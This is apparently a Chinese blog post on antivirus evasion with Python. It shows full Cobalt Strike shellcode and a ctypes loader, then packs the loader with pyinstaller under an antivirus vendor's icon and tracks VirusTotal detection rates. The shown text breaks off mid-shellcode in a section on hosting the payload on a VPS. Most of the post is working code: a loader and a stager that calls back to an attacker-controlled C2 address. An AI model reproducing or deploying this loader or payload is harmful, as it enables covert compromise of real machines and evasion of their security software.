渗透测试笔记之Python免杀——两行代码实现免杀！VT查杀率：10/68（思路：将ShellCode和Loader一起分离免杀）

Posted 2021-11-22 AA8j

文章目录

• 1. shellcode Loader
• • 1.1 生成shellcode
  • 1.2 shellcode loader 脚本上线测试
  • 1.3 使用pyinstaller生成exe文件上线测试
  • 1.4 VT查杀率：24/68
• 2. ShellCode 分离
• • 2.1 上传加密后的shellcode
  • 2.2 改写shellcode loader
  • 2.3 shellcode 分离后shellcode loader脚本上线测试
  • 2.4 shellcode 分离后，使用pyinstaller生成exe文件上线测试
  • 2.5 VT查杀率：14/67
• 3. ShellCode 及ShellCoder 的分离
• • 3.1 改写shellcode loader
  • 3.2 shellcode和shellcode loader均分离后，两行代码的脚本上线测试
  • 3.3 使用pyinstaller生成exe文件上线测试
  • 3.4 VT查杀率：10/68

1. shellcode Loader

1.1 生成shellcode

生成py类型的payload：


得到shellcode：

buf = "\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc8\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48\\x8b\\x52\\x20\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x66\\x81\\x78\\x18\\x0b\\x02\\x75\\x72\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x67\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x49\\x01\\xd0\\xe3\\x56\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\x38\\xe0\\x75\\xf1\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\\x8b\\x12\\xe9\\x4f\\xff\\xff\\xff\\x5d\\x6a\\x00\\x49\\xbe\\x77\\x69\\x6e\\x69\\x6e\\x65\\x74\\x00\\x41\\x56\\x49\\x89\\xe6\\x4c\\x89\\xf1\\x41\\xba\\x4c\\x77\\x26\\x07\\xff\\xd5\\x48\\x31\\xc9\\x48\\x31\\xd2\\x4d\\x31\\xc0\\x4d\\x31\\xc9\\x41\\x50\\x41\\x50\\x41\\xba\\x3a\\x56\\x79\\xa7\\xff\\xd5\\xeb\\x73\\x5a\\x48\\x89\\xc1\\x41\\xb8\\xb3\\x15\\x00\\x00\\x4d\\x31\\xc9\\x41\\x51\\x41\\x51\\x6a\\x03\\x41\\x51\\x41\\xba\\x57\\x89\\x9f\\xc6\\xff\\xd5\\xeb\\x59\\x5b\\x48\\x89\\xc1\\x48\\x31\\xd2\\x49\\x89\\xd8\\x4d\\x31\\xc9\\x52\\x68\\x00\\x02\\x40\\x84\\x52\\x52\\x41\\xba\\xeb\\x55\\x2e\\x3b\\xff\\xd5\\x48\\x89\\xc6\\x48\\x83\\xc3\\x50\\x6a\\x0a\\x5f\\x48\\x89\\xf1\\x48\\x89\\xda\\x49\\xc7\\xc0\\xff\\xff\\xff\\xff\\x4d\\x31\\xc9\\x52\\x52\\x41\\xba\\x2d\\x06\\x18\\x7b\\xff\\xd5\\x85\\xc0\\x0f\\x85\\x9d\\x01\\x00\\x00\\x48\\xff\\xcf\\x0f\\x84\\x8c\\x01\\x00\\x00\\xeb\\xd3\\xe9\\xe4\\x01\\x00\\x00\\xe8\\xa2\\xff\\xff\\xff\\x2f\\x4f\\x6c\\x69\\x39\\x00\\xea\\xf8\\x43\\x38\\x93\\xe8\\x36\\x73\\xce\\x2f\\x3b\\x08\\x6f\\xa9\\x7e\\x11\\xdc\\x18\\xf8\\x71\\x43\\xe2\\x0f\\x92\\xd7\\x3e\\xd6\\xac\\xfc\\xab\\x59\\x15\\xd9\\xdc\\x48\\x2c\\x76\\xc9\\x3c\\x19\\x77\\xbe\\x4f\\x57\\xbf\\xe0\\x17\\xfb\\x7b\\x1f\\x0f\\xd5\\xc3\\x89\\x12\\x37\\x8b\\xe7\\x37\\x80\\xd8\\x2c\\x96\\x7c\\xb8\\x08\\x0e\\xf1\\x37\\x48\\x15\\x9e\\xa8\\x00\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x3a\\x20\\x4d\\x6f\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x34\\x2e\\x30\\x20\\x28\\x63\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x3b\\x20\\x4d\\x53\\x49\\x45\\x20\\x37\\x2e\\x30\\x3b\\x20\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x4e\\x54\\x20\\x35\\x2e\\x31\\x3b\\x20\\x54\\x72\\x69\\x64\\x65\\x6e\\x74\\x2f\\x34\\x2e\\x30\\x29\\x0d\\x0a\\x00\\x67\\x8d\\x04\\x19\\x98\\x95\\x99\\x3d\\x2f\\x9e\\x37\\xab\\x27\\x74\\x98\\xe8\\xc9\\x1e\\x06\\xce\\x89\\x67\\xcd\\x7d\\x63\\xb1\\x88\\x6f\\xdc\\xee\\x0f\\xf2\\x32\\xa0\\xf4\\x0e\\xf6\\xcf\\xc5\\x60\\x0c\\x1d\\xcb\\x29\\xfc\\xd7\\xc2\\xfa\\xba\\x59\\xdf\\x1a\\x04\\xd3\\xc5\\x20\\xcd\\xed\\x18\\x6e\\xe9\\xa1\\xe8\\xad\\xa7\\x7f\\xf2\\x97\\xab\\x8b\\x54\\x19\\xe3\\x85\\x19\\x80\\x33\\x88\\xf1\\x68\\x54\\x7a\\xcb\\x8b\\xf1\\x5e\\xf9\\x80\\x59\\xd1\\x4d\\x4e\\x41\\x0a\\xcc\\xe0\\x3b\\x5a\\xb4\\x50\\x30\\xbe\\xc0\\xa5\\xa3\\x74\\xbf\\x36\\xbb\\xc5\\xee\\x1c\\x1a\\x3c\\x25\\xb0\\x0e\\x78\\xa7\\xa9\\x6d\\x16\\xce\\x32\\x17\\x7b\\x9c\\x0d\\x44\\x5e\\x3e\\xc5\\x7d\\x7c\\xba\\xb0\\x83\\x34\\x31\\xcd\\xcc\\x11\\xf8\\x78\\x64\\x4d\\xe5\\x93\\x0d\\x7d\\xce\\xac\\x63\\x6f\\x06\\x42\\x0d\\x18\\xa2\\x5e\\x01\\xb3\\x87\\xcd\\x1d\\x8e\\xd4\\x0b\\x19\\xe8\\xd7\\xca\\x9f\\x83\\xaa\\xa8\\x4b\\x75\\x45\\x62\\x93\\x55\\xf2\\x2c\\xb7\\xe9\\x2f\\xd8\\x78\\x38\\x64\\x21\\xbd\\x5e\\xeb\\x11\\xd3\\x38\\xaa\\x1f\\x5c\\x34\\xd4\\x04\\x8c\\xec\\x18\\x44\\x5f\\x46\\x40\\x65\\x5b\\x67\\xec\\xd1\\x39\\x66\\x9d\\x89\\x9c\\x47\\xde\\x9e\\xe9\\x00\\x41\\xbe\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x48\\x31\\xc9\\xba\\x00\\x00\\x40\\x00\\x41\\xb8\\x00\\x10\\x00\\x00\\x41\\xb9\\x40\\x00\\x00\\x00\\x41\\xba\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x48\\x93\\x53\\x53\\x48\\x89\\xe7\\x48\\x89\\xf1\\x48\\x89\\xda\\x41\\xb8\\x00\\x20\\x00\\x00\\x49\\x89\\xf9\\x41\\xba\\x12\\x96\\x89\\xe2\\xff\\xd5\\x48\\x83\\xc4\\x20\\x85\\xc0\\x74\\xb6\\x66\\x8b\\x07\\x48\\x01\\xc3\\x85\\xc0\\x75\\xd7\\x58\\x58\\x58\\x48\\x05\\x00\\x00\\x00\\x00\\x50\\xc3\\xe8\\x9f\\xfd\\xff\\xff\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x38\\x2e\\x34\\x38\\x00\\x19\\x69\\xa0\\x8d"

1.2 shellcode loader 脚本上线测试

将生成的payload复制到此加载器：

#!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time    : 2021/10/24 15:32
# @Author  : AA8j
# @Site    : 
# @File    : Loader2.py
# @Software: PyCharm
# @Blog    : https://blog.csdn.net/qq_44874645
import ctypes

shellcode = b"\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc8\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48\\x8b\\x52\\x20\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x66\\x81\\x78\\x18\\x0b\\x02\\x75\\x72\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x67\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x49\\x01\\xd0\\xe3\\x56\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\x38\\xe0\\x75\\xf1\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\\x8b\\x12\\xe9\\x4f\\xff\\xff\\xff\\x5d\\x6a\\x00\\x49\\xbe\\x77\\x69\\x6e\\x69\\x6e\\x65\\x74\\x00\\x41\\x56\\x49\\x89\\xe6\\x4c\\x89\\xf1\\x41\\xba\\x4c\\x77\\x26\\x07\\xff\\xd5\\x48\\x31\\xc9\\x48\\x31\\xd2\\x4d\\x31\\xc0\\x4d\\x31\\xc9\\x41\\x50\\x41\\x50\\x41\\xba\\x3a\\x56\\x79\\xa7\\xff\\xd5\\xeb\\x73\\x5a\\x48\\x89\\xc1\\x41\\xb8\\xb3\\x15\\x00\\x00\\x4d\\x31\\xc9\\x41\\x51\\x41\\x51\\x6a\\x03\\x41\\x51\\x41\\xba\\x57\\x89\\x9f\\xc6\\xff\\xd5\\xeb\\x59\\x5b\\x48\\x89\\xc1\\x48\\x31\\xd2\\x49\\x89\\xd8\\x4d\\x31\\xc9\\x52\\x68\\x00\\x02\\x40\\x84\\x52\\x52\\x41\\xba\\xeb\\x55\\x2e\\x3b\\xff\\xd5\\x48\\x89\\xc6\\x48\\x83\\xc3\\x50\\x6a\\x0a\\x5f\\x48\\x89\\xf1\\x48\\x89\\xda\\x49\\xc7\\xc0\\xff\\xff\\xff\\xff\\x4d\\x31\\xc9\\x52\\x52\\x41\\xba\\x2d\\x06\\x18\\x7b\\xff\\xd5\\x85\\xc0\\x0f\\x85\\x9d\\x01\\x00\\x00\\x48\\xff\\xcf\\x0f\\x84\\x8c\\x01\\x00\\x00\\xeb\\xd3\\xe9\\xe4\\x01\\x00\\x00\\xe8\\xa2\\xff\\xff\\xff\\x2f\\x4f\\x6c\\x69\\x39\\x00\\xea\\xf8\\x43\\x38\\x93\\xe8\\x36\\x73\\xce\\x2f\\x3b\\x08\\x6f\\xa9\\x7e\\x11\\xdc\\x18\\xf8\\x71\\x43\\xe2\\x0f\\x92\\xd7\\x3e\\xd6\\xac\\xfc\\xab\\x59\\x15\\xd9\\xdc\\x48\\x2c\\x76\\xc9\\x3c\\x19\\x77\\xbe\\x4f\\x57\\xbf\\xe0\\x17\\xfb\\x7b\\x1f\\x0f\\xd5\\xc3\\x89\\x12\\x37\\x8b\\xe7\\x37\\x80\\xd8\\x2c\\x96\\x7c\\xb8\\x08\\x0e\\xf1\\x37\\x48\\x15\\x9e\\xa8\\x00\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x3a\\x20\\x4d\\x6f\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x34\\x2e\\x30\\x20\\x28\\x63\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x3b\\x20\\x4d\\x53\\x49\\x45\\x20\\x37\\x2e\\x30\\x3b\\x20\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x4e\\x54\\x20\\x35\\x2e\\x31\\x3b\\x20\\x54\\x72\\x69\\x64\\x65\\x6e\\x74\\x2f\\x34\\x2e\\x30\\x29\\x0d\\x0a\\x00\\x67\\x8d\\x04\\x19\\x98\\x95\\x99\\x3d\\x2f\\x9e\\x37\\xab\\x27\\x74\\x98\\xe8\\xc9\\x1e\\x06\\xce\\x89\\x67\\xcd\\x7d\\x63\\xb1\\x88\\x6f\\xdc\\xee\\x0f\\xf2\\x32\\xa0\\xf4\\x0e\\xf6\\xcf\\xc5\\x60\\x0c\\x1d\\xcb\\x29\\xfc\\xd7\\xc2\\xfa\\xba\\x59\\xdf\\x1a\\x04\\xd3\\xc5\\x20\\xcd\\xed\\x18\\x6e\\xe9\\xa1\\xe8\\xad\\xa7\\x7f\\xf2\\x97\\xab\\x8b\\x54\\x19\\xe3\\x85\\x19\\x80\\x33\\x88\\xf1\\x68\\x54\\x7a\\xcb\\x8b\\xf1\\x5e\\xf9\\x80\\x59\\xd1\\x4d\\x4e\\x41\\x0a\\xcc\\xe0\\x3b\\x5a\\xb4\\x50\\x30\\xbe\\xc0\\xa5\\xa3\\x74\\xbf\\x36\\xbb\\xc5\\xee\\x1c\\x1a\\x3c\\x25\\xb0\\x0e\\x78\\xa7\\xa9\\x6d\\x16\\xce\\x32\\x17\\x7b\\x9c\\x0d\\x44\\x5e\\x3e\\xc5\\x7d\\x7c\\xba\\xb0\\x83\\x34\\x31\\xcd\\xcc\\x11\\xf8\\x78\\x64\\x4d\\xe5\\x93\\x0d\\x7d\\xce\\xac\\x63\\x6f\\x06\\x42\\x0d\\x18\\xa2\\x5e\\x01\\xb3\\x87\\xcd\\x1d\\x8e\\xd4\\x0b\\x19\\xe8\\xd7\\xca\\x9f\\x83\\xaa\\xa8\\x4b\\x75\\x45\\x62\\x93\\x55\\xf2\\x2c\\xb7\\xe9\\x2f\\xd8\\x78\\x38\\x64\\x21\\xbd\\x5e\\xeb\\x11\\xd3\\x38\\xaa\\x1f\\x5c\\x34\\xd4\\x04\\x8c\\xec\\x18\\x44\\x5f\\x46\\x40\\x65\\x5b\\x67\\xec\\xd1\\x39\\x66\\x9d\\x89\\x9c\\x47\\xde\\x9e\\xe9\\x00\\x41\\xbe\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x48\\x31\\xc9\\xba\\x00\\x00\\x40\\x00\\x41\\xb8\\x00\\x10\\x00\\x00\\x41\\xb9\\x40\\x00\\x00\\x00\\x41\\xba\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x48\\x93\\x53\\x53\\x48\\x89\\xe7\\x48\\x89\\xf1\\x48\\x89\\xda\\x41\\xb8\\x00\\x20\\x00\\x00\\x49\\x89\\xf9\\x41\\xba\\x12\\x96\\x89\\xe2\\xff\\xd5\\x48\\x83\\xc4\\x20\\x85\\xc0\\x74\\xb6\\x66\\x8b\\x07\\x48\\x01\\xc3\\x85\\xc0\\x75\\xd7\\x58\\x58\\x58\\x48\\x05\\x00\\x00\\x00\\x00\\x50\\xc3\\xe8\\x9f\\xfd\\xff\\xff\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x38\\x2e\\x34\\x38\\x00\\x19\\x69\\xa0\\x8d"
# CS生成的ShellCode
shellcode = bytearray(shellcode)

"""
【设置返回类型】
我们需要用VirtualAlloc函数来申请内存，返回类型必须和系统位数相同
想在64位系统上运行，必须使用restype函数设置VirtualAlloc返回类型为ctypes.c_unit64，否则默认的是 32 位
"""
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64

"""
【申请内存】
ctypes.c_int(0)                 :是NULL，系统将会决定分配内存区域的位置，并且按64KB向上取整
ctypes.c_int(len(shellcode))    :以字节为单位分配或者保留多大区域
ctypes.c_int(0x3000)            :是 MEM_COMMIT(0x1000) 和 MEM_RESERVE(0x2000)类型的合并
ctypes.c_int(0x40)              :是权限为PAGE_EXECUTE_READWRITE 该区域可以执行代码，应用程序可以读写该区域。
"""
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))

"""
【放入shellcode】
从指定内存地址将内容复制到我们申请的内存中去，shellcode字节多大就复制多大
"""
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr),
    buf,
    ctypes.c_int(len(shellcode))
)

"""
【创建一个线程从shellcode放置位置开始执行】
lpThreadAttributes  :为NULL使用默认安全性
dwStackSize         :为0，默认将使用与调用该函数的线程相同的栈空间大小   
lpStartAddress      :为ctypes.c_uint64(ptr)，定位到申请的内存所在的位置 
lpParameter         :不需传递参数时为NULL
dwCreationFlags     :属性为0，表示创建后立即激活
lpThreadId          :为ctypes.pointer(ctypes.c_int(0))不想返回线程ID,设置值为NULL
"""
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_uint64(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
)


"""
【等待线程结束】
这里两个参数，一个是创建的线程，一个是等待时间
当线程退出时会给出一个信号，函数收到后会结束程序。
当时间设置为0或超过等待时间，程序也会结束，所以线程也会跟着结束。
正常的话我们创建的线程是需要一直运行的，所以将时间设为负数，等待时间将成为无限等待，程序就不会结束。
"""
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

靶机使用python运行，成功上线：

1.3 使用pyinstaller生成exe文件上线测试

使用pyinstaller生成exe文件：

pyinstaller -w -F Loader2.py -i 360.ico -n test.exe

pyinstaller参数说明：

-F，-onefile	产生单个的可执行文件
-D，--onedir	产生一个目录（包含多个文件）作为可执行程序
-a，--ascii	不包含 Unicode 字符集支持
-d，--debug	产生 debug 版本的可执行文件
-w，--windowed，--noconsolc	指定程序运行时不显示命令行窗口（仅对 Windows 有效）
-c，--nowindowed，--console	指定使用命令行窗口运行程序（仅对 Windows 有效）
-o DIR，--out=DIR	指定 spec 文件的生成目录。如果没有指定，则默认使用当前目录来生成 spec 文件
-p DIR，--path=DIR	设置 Python 导入模块的路径（和设置 PYTHONPATH 环境变量的作用相似）。也可使用路径分隔符（Windows 使用分号，Linux 使用冒号）来分隔多个路径
-n NAME，--name=NAME	指定项目（产生的 spec）名字。如果省略该选项，那么第一个脚本的主文件名将作为 spec 的名字

双击测试能否上线：
成功上线：

1.4 VT查杀率：24/68

360还是能轻松过的：

2. ShellCode 分离

2.1 上传加密后的shellcode

将ShellCode使用Base64加密存放到vps上可供访问：
shellcode（注意格式为b"shellcode"）：

b"\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc8\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48\\x8b\\x52\\x20\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x66\\x81\\x78\\x18\\x0b\\x02\\x75\\x72\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x67\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x49\\x01\\xd0\\xe3\\x56\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\x38\\xe0\\x75\\xf1\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\\x8b\\x12\\xe9\\x4f\\xff\\xff\\xff\\x5d\\x6a\\x00\\x49\\xbe\\x77\\x69\\x6e\\x69\\x6e\\x65\\x74\\x00\\x41\\x56\\x49\\x89\\xe6\\x4c\\x89\\xf1\\x41\\xba\\x4c\\x77\\x26\\x07\\xff\\xd5\\x48\\x31\\xc9\\x48\\x31\\xd2\\x4d\\x31\\xc0\\x4d\\x31\\xc9\\x41\\x50\\x41\\x50\\x41\\xba\\x3a\\x56\\x79\\xa7\\xff\\xd5\\xeb\\x73\\x5a\\x48\\x89\\xc1\\x41\\xb8\\xb3\\x15\\x00\\x00\\x4d\\x31\\xc9\\x41\\x51\\x41\\x51\\x6a\\x03\\x41\\x51\\x41\\xba\\x57\\x89\\x9f\\xc6\\xff\\xd5\\xeb\\x59\\x5b\\x48\\x89\\xc1\\x48\\x31\\xd2\\x49\\x89\\xd8\\x4d\\x31\\xc9\\x52\\x68\\x00\\x02\\x40\\x84\\x52\\x52\\x41\\xba\\xeb\\x55\\x2e\\x3b\\xff\\xd5\\x48\\x89\\xc6\\x48\\x83\\xc3\\x50\\x6a\\x0a\\x5f\\x48\\x89\\xf1\\x48\\x89\\xda\\x49\\xc7\\xc0\\xff\\xff\\xff\\xff\\x4d\\x31\\xc9\\x52\\x52\\x41\\xba\\x2d\\x06\\x18\\x7b\\xff\\xd5\\x85\\xc0\\x0f\\x85\\x9d\\x01\\x00\\x00\\x48\\xff\\xcf\\x0f\\x84\\x8c\\x01\\x00\\x00\\xeb\\xd3\\xe9\\xe4\\x01\\x00\\x00\\xe8\\xa2\\xff\\xff\\xff\\x2f\\x4f\\x6c\\x69\\x39\\x00\\xea\\xf8\\x43\\x38\\x93\\xe8\\x36\\x73\\xce\\x2f\\x3b\\x08\\x6f\\xa9\\x7e\\x11\\xdc\\x18\\xf8\\x71\\x43\\xe2\\x0f\\x92\\xd7\\x3e\\xd6\\xac\\xfc\\xab\\x59\\x15\\xd9\\xdc\\x48\\x2c\\x76\\xc9\\x3c\\x19\\x77\\xbe\\x4f\\x57\\xbf\\xe0\\x17\\xfb\\x7b\\x1f\\x0f\\xd5\\xc3\\x89\\x12\\x37\\x8b\\xe7\\x37\\x80\\xd8\\x2c\\x96\\x7c\\xb8\\x08\\x0e\\xf1\\x37\\x48\\x15\\x9e\\xa8\\x00\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x3a\\x20\\x4d\\x6f\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x34\\x2e\\x30\\x20\\x28\\x63\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x3b\\x20\\x4d\\x53\\x49\\x45\\x20\\x37\\x2e\\x30\\x3b\\x20\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x4e\\x54\\x20\\x35\\x2e\\x31\\x3b\\x20\\x54\\x72\\x69\\x64\\x65\\x6e\\x74\\x2f\\x34\\x2e\\x30\\x29\\x0d\\x0a\\x00\\x67\\x8d\\x04\\x19\\x98\\x95\\x99\\x3d\\x2f\\x9e\\x37\\xab\\x27\\x74\\x98\\xe8\\xc9\\x1e\\x06\\xce\\x89\\x67\\xcd\\x7d\\x63\\xb1\\x88\\x6f\\xdc\\xee
以上是关于渗透测试笔记之Python免杀——两行代码实现免杀！VT查杀率：10/68（思路：将ShellCode和Loader一起分离免杀）的主要内容，如果未能解决你的问题，请参考以下文章
 
 网络安全渗透测试之木马免杀
 Metasploit 实现木马生成捆绑及免杀
 2019-2020-2 网络对抗技术 20175217 Exp3 免杀原理与实践
 Webshell免杀-JSP
 安全攻防实战系列MSF
 20155320 Exp3 免杀原理与实践